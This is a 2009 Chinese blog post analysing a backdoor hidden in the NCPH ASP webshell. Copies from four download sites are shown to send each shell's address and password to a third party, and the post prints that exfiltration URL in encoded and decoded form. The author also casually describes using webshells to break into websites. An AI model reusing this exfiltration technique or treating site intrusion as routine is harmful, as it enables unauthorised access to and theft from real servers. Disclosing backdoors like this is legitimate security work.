NCPH-Webshell后门全分析

作者:中华攻鸡

本文虽没什么技术含量,但能得到大家的鼓励,我相信自己会越做越好
一直有人在反映,却没人发表出一篇文章来,那我就当回作者,写写......

NCPH-webshell,功能强大,深受我们的喜爱。但他的背后,你知道有什么吗?
我可以去掉后门,自己用,但新手们呢?他们是无辜的,我们为的就是一起安全,一起努力。

正文:

当时在黑吧下的时候,很多人都在评论说马有后门,
我当时也没怎么在意,糊里糊涂地一直用着,马自带的免杀效果很不错,能过部分杀
软,至少我进站没被杀过,个人蛮喜欢,但谁又知道它背后的秘密呢,而那些新手又怎么知道自己辛辛苦
苦XX的站点正在被人窥见,被人轻而易举地拿走了,哎,悲哀啊,悲哀!

真会扯淡的,那下面就进入正题,看分析,
我拿了 谷歌搜索到的4个站点下的马来做分析。
 

1.jpg 大小: 91.87 K 尺寸: 489 x 500 浏览: 7 次 点击打开新窗口浏览全图

2.jpg 大小: 14.92 K 尺寸: 497 x 106 浏览: 6 次 点击打开新窗口浏览全图

http://www.hack58.net/Soft/html/15/38/2008/2008070213622.htm
http://www.cnhacknet.com/Soft/yuan/2008-07-03/154.html
http://www.sec520.com/Soft/2008/200810/20081031190951.html
http://www.520hack.com/Soft/Soft1/200807/10565.html

我将下回来的马分别标上记号,看下黑吧的

3.jpg 大小: 16.88 K 尺寸: 453 x 156 浏览: 6 次 点击打开新窗口浏览全图

4.jpg 大小: 37.15 K 尺寸: 500 x 178 浏览: 5 次 点击打开新窗口浏览全图

从 7月份一直到前几天,我拿站一直用这个大马,还真为放后门的人工作了不少,
只可惜我这人,没多少SHELL有保留,没事就拿去论坛给大伙分享分享,练练提权。
我自己搭建了ASP服务器,下面就一步步看把
我先将他们的文件名一个个编辑,好辨认

5.jpg 大小: 22.8 K 尺寸: 500 x 180 浏览: 5 次 点击打开新窗口浏览全图

先看黑吧的
连接被阻挡了,这里先不分析,等下看总结分析

6.gif 大小: 40.66 K 尺寸: 500 x 429 浏览: 6 次 点击打开新窗口浏览全图

7.jpg 大小: 14.37 K 尺寸: 398 x 125 浏览: 5 次 点击打开新窗口浏览全图

再来看 网安新世纪的

8.jpg 大小: 37.01 K 尺寸: 448 x 310 浏览: 8 次 点击打开新窗口浏览全图

安妨快线

9.jpg 大小: 26.54 K 尺寸: 450 x 234 浏览: 5 次 点击打开新窗口浏览全图

黑客网落

10.jpg 大小: 29.01 K 尺寸: 452 x 231 浏览: 6 次 点击打开新窗口浏览全图

全是同一个后门地址
那现在我们就来看看那个后门连接地址到底是什么?

11.jpg 大小: 28.19 K 尺寸: 455 x 229 浏览: 5 次 点击打开新窗口浏览全图

http://%76%67%2e%6c%61/%31/?%75=127.0.0.1/hack58.asp&%70=ncph
后门地址密码全在这条连接上,朋友们,你们看懂了吗?

127.0.0.1/hack58.asp 是我的SHELL地址,后面的ncph就是SHELL密码
我们放解密程序去解下

12.jpg 大小: 10.04 K 尺寸: 422 x 101 浏览: 5 次 点击打开新窗口浏览全图

http://vg.la/1/?u=127.0.0.1/hack58.asp&p=ncph    后门连接出来了
注意:在切换SHELL的时候,一定要先将IE里的 COOKIE和文件删除

13.gif 大小: 26.14 K 尺寸: 403 x 310 浏览: 6 次 点击打开新窗口浏览全图

Posted on: 2009, March 8, 9:51 AM | Filed under: 反向分析 |
Tags:web

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »